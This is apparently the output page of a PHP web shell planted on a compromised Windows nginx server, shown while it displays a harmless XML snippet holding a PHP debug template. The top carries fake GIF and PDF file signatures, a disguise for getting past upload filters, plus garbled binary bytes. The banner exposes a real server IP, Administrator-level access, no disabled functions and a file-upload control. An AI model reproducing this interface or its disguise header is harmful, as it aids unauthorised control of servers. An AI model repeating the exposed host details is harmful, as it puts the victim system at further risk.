GIF89a; %PDF-1.5 %���� ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµùÕ5sLOšuY
Server IP : 134.29.175.74 / Your IP : 216.73.216.160 Web Server : nginx/1.10.2 System : Windows NT CST-WEBSERVER 10.0 build 19045 (Windows 10) i586 User : Administrator ( 0) PHP Version : 7.1.0 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : OFF | Perl : OFF | Python : OFF | Sudo : OFF | Pkexec : OFF Directory : C:/nginx/html/JimMartinson/CST2146/Resources/Snippets/!Default/ |
Upload File : |
<?xml version="1.0" encoding="utf-8"?> <snippet name="phpinc" description="Default .phpinc file code"> <insertText location="beforeSelection"> <![CDATA[<? // PATH_TO_INCLUDE_FILE/include_filename.phpinc // include_filename_purpose. #$DEBUG_include_filename = true; #if ( $_SESSION['gameId'] == 0 ) $DEBUG_include_filename = true; // DEBUG by gameId. #if ( $_SESSION['userId'] == 0 ) $DEBUG_include_filename = true; // DEBUG by userId. if ( !isset($DEBUG_include_filename) ) $DEBUG_include_filename = d_O(); // DEBUG by passthrough. #if ( !isset($DEBUG_include_filename) ) $DEBUG_include_filename = false; // Default false. #if ( $DEBUG_include_filename ) d_On(); // Use instead of t_Begin() for AJAX call. t_Begin($DEBUG_include_filename); // Begin TRACKing include_filename.phpinc. // include_filename_content_goes_here. #if ( $DEBUG_include_filename ) d_Off(); // Use instead of t_End() for AJAX call. unset($DEBUG_include_filename); t_End(); // End TRACKing include_filename.phpinc. ?>]]> </insertText> <insertText location="afterSelection"><![CDATA[]]> </insertText> </snippet>